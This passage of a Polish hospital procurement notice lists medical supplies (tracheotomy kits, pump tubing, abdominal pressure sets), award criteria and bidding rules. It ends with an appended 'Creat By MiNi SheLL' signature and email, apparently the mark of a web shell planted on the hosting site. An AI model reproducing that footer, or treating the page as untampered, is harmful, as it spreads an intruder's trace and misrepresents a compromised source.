użytkowania; -wewnętrzna średnica ramienia łączącego się z systemem zamkniętym 22mm. Adapter kompatybilny z w/w zestawem do odsysania,	szt	100 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33141620-2 - Zestawy medyczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2026-07-23</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Pakiet Nr 3 - ZESTAW DO TRACHEOTOMII PRZESKÓRNEJ<br/>L.p / Przedmiot zamówienia / Jedn. / Zapotrzebowanie<br/>1. Uzupełniający zestaw do przeskórnej tracheotomii metodą Griggsa, bez peana, zawierający skalpel, kaniulę z igłą i strzykawką do identyfikacji tchawicy, prowadnicę Seldingera, rozszerzadło oraz rurkę tracheostomijną z mankietem niskociśnieniowym, z odsysaniem znad mankietu.	szt	15<br/>2. Wymiennik ciepła i wilgoci dla pacjentów ze spontaniczną czynnością oddechowa, u których górne drogi oddechowe zostały ominięte przez rurkę intubacyjną lub tracheostomijna. Wyposażony w podwójny wkład papierowy położony po obu stronach centralnie umieszczonego portu tlenowego, przez który możliwe jest uzyskanie nawet 60% koncentracji tlenu we wdychanym powietrzu. Wilgotność wyjściowa 25 mg. H2O przy 15 oddechach/min. I TV 500 ml. Przeznaczony na 24h, sterylny.	szt	450 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33141620-2 - Zestawy medyczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2026-07-23</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Pakiet Nr 4 - DRENY DO POMP ASCOR I MEDIMA<br/>L.p / Przedmiot zamówienia / Jedn. / Zapotrzebowanie<br/>1. Dreny do pompy perystaltycznej typu Ascor AP31	szt	100<br/>2. Dreny do pompy perystaltycznej typu Medima	szt	250 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33141640-8 - Dreny</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2026-07-23</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Pakiet nr 5 - ZESTAW DO POMIARU CIŚNIENIA ŚRÓDBRZUSZNEGO<br/>L.p / Przedmiot zamówienia / Jedn. / Zapotrzebowanie<br/>1. Zamknięty system do nieinwazyjnego pomiaru cisnienia śródbrzusznego metodą manometryczną (fabrycznie połaczony zestaw do GZM z linią pomiarową, sterylny, w jednym opakowaniu co zapewnia utrzymanie systemu zamknietego), 20 ml dren manometryczny wyposażony w filtr biologiczny, umieszczony miedzy cewnikiem Foley a zestawem do GZM, zapewniający własciwe odpowietrzenie. Zastawka antyzwrotna wbudowana w łącznik do cewnika Foley zapobiega cofaniu sie moczu z zesrawu do CZM do linii pomiarowej. Zintegrowany zacisk drenu pozwalający na wyrównanie ciśnień i precyzyjny odczyt wartości cisnienia śródbrzusznego, bezigłowy port do pobierania próbek, linie pomiarowe wyskaloane w mm Hg, czas uzycia 7 dni.	szt	350 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33141620-2 - Zestawy medyczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2026-07-23</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Oświadczenie wykonawcy w sprawie grupy kapitałowej – Załącznik Nr 5<br/>Oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności <br/>do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie <br/>konkurencji i konsumentów (Dz.U.2024.594 t.j. z dnia 2024.04.18 ze zm.), z innym <br/>Wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do <br/>udziału w postępowaniu, albo oświadczenie o przynależności do tej samej grupy kapitałowej <br/>wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty <br/>SWZ<br/>Strona: 6/16<br/>częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego <br/>Wykonawcy należącego do tej samej grupy kapitałowej;<br/>2. Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji <br/>i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt. 4 ustawy Pzp, <br/>sporządzonej nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy <br/>wymagają wpisu do rejestru lub ewidencji;</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1. Oświadczenie Wykonawcy, że oferowany przedmiot zamówienia posiada wszystkie <br/>wymagane aktualne dokumenty (deklaracja zgodności wyrobu z wymaganiami zasadniczymi <br/>wystawiona przez producenta, certyfikat zgodności jednostki notyfikowanej, jeżeli brała udział w <br/>ocenie zgodności i zgłoszenie/powiadomienie do Prezesa Urzędu Rejestracji Produktów <br/>Leczniczych, Wyrobów Medycznych i Produktów Biobójczych) dopuszczające do obrotu i <br/>stosowania zgodnie z przepisami ustawy z dn. 7 kwietnia 2022r. o wyrobach medycznych <br/>(Dz.U.2022.974 z dnia 2022.05.09 ze zm.), wraz ze zobowiązaniem ich przekazania na każde <br/>żądanie Zamawiającego, zgodnie z Załącznikiem Nr 4 do SWZ<br/>1. Karty danych technicznych lub inne materiały informacyjne zawierające oferowany przedmiot <br/>zamówienia, potwierdzające że oferowany przedmiot zamówienia spełnia wymagania opisane <br/>przez Zamawiającego w SWZ <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> 1. Oświadczenie Wykonawcy, że oferowany przedmiot zamówienia posiada wszystkie <br/>wymagane aktualne dokumenty (deklaracja zgodności wyrobu z wymaganiami zasadniczymi <br/>wystawiona przez producenta, certyfikat zgodności jednostki notyfikowanej, jeżeli brała udział w <br/>ocenie zgodności i zgłoszenie/powiadomienie do Prezesa Urzędu Rejestracji Produktów <br/>Leczniczych, Wyrobów Medycznych i Produktów Biobójczych) dopuszczające do obrotu i <br/>stosowania zgodnie z przepisami ustawy z dn. 7 kwietnia 2022r. o wyrobach medycznych <br/>(Dz.U.2022.974 z dnia 2022.05.09 ze zm.), wraz ze zobowiązaniem ich przekazania na każde <br/>żądanie Zamawiającego, zgodnie z Załącznikiem Nr 4 do SWZ<br/>2. Karty danych technicznych lub inne materiały informacyjne zawierające oferowany przedmiot <br/>zamówienia, potwierdzające że oferowany przedmiot zamówienia spełnia wymagania opisane <br/>przez Zamawiającego w SWZ <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Pełnomocnictwo do podpisania oferty, oświadczeń i dokumentów składających się na ofertę, o ile upoważnienie to nie<br/>wynika z innych dokumentów dołączonych do oferty,<br/>2. W przypadku oferty składanej przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia (np.<br/>konsorcjum),do oferty powinno zostać załączone pełnomocnictwo dla Osoby Uprawnionej do reprezentowania ich w<br/>postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy <br/>zobowiązani są do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu o udzielenie <br/>zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia <br/>publicznego.<br/>2. Pełnomocnictwo należy dołączyć do oferty i powinno ono zawierać w szczególności wskazanie:<br/>1) postępowania o udzielenie zamówienie publicznego, którego dotyczy;<br/>2) wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia;<br/>3) ustanowionego pełnomocnika oraz zakresu jego umocowania.<br/>3. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, dokument ”Oświadczenie <br/>o niepodleganiu wykluczeniu”, o którym mowa w Rozdziale 8 ust. 1 pkt 1) SWZ, składa każdy <br/>z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają brak podstaw <br/>wykluczenia z postępowania w przypadkach wskazanych w Rozdziale 7 SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy Zamawiający określił w § 4 projektu umowy - Załącznik Nr 6 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-03-05 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/transakcja/1067379</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-03-05 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-04-03</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Ponadto Zamawiający wykluczy z postępowania o udzielenie zamówienia Wykonawcę, wobec którego <br/>zachodzą podstawy wykluczenia, o których mowa w art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o <br/>szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących <br/>ochronie bezpieczeństwa narodowego (Dz. U. 2022.835 z dnia 2022.04.15).<br/>2. Wykluczenie, o którym mowa w ust. 6 następuje na okres trwania określonych w nim okoliczności.<br/>3. W przypadku wykonawcy lub uczestnika konkursu wykluczonego na podstawie ust. 6, Zamawiający <br/>odrzuca wniosek o dopuszczenie do udziału w postępowaniu o udzielnie zamówienia publicznego lub <br/>ofertę takiego wykonawcy lub uczestnika konkursu, nie zaprasza go do złożenia oferty wstępnej, oferty <br/>podlegającej negocjacjom, oferty dodatkowej, oferty lub oferty ostatecznej, nie zaprasza go do <br/>negocjacji lub dialogu, a także nie prowadzi z takim wykonawcą negocjacji lub dialogu, odrzuca <br/>wniosek o dopuszczenie do udziału w konkursie, nie zaprasza do złożenia pracy konkursowej lub nie <br/>przeprowadza oceny pracy konkursowej, odpowiednio do trybu stosowanego do udzielenia zamówienia <br/>publicznego oraz etapu prowadzonego postępowania o udzielenie zamówienia publicznego.<br/>4. Zamawiający informuje, że zgodnie z art. 7 ust. 6-7 ustawy z dnia 13 kwietnia 2022 r. o szczególnych <br/>rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie <br/>bezpieczeństwa narodowego (Dz. U.2022.835 z dnia 2022.04.15) osoba lub podmiot podlegające <br/>wykluczeniu na podstawie art. 7 ust. 1 tej ustawy, które w okresie tego wykluczenia ubiegają się o <br/>udzielenie zamówienia publicznego lub biorą udział w postępowaniu o udzielenie zamówienia <br/>publicznego podlegają karze pieniężnej. Karę pieniężną, o której mowa w ust. 6 tej ustawy, nakłada <br/>Prezes Urzędu Zamówień Publicznych, w drodze decyzji, w wysokości do 20 000 000 zł.<br/>5. Zamawiający informuje, że zgodnie z art. 7 ust. 5 ustawy, o której mowa w ust. 11, przez ubieganie się <br/>o udzielenie zamówienia publicznego rozumie się złożenie oferty.

Creat By MiNi SheLL
Email: jattceo@gmail.com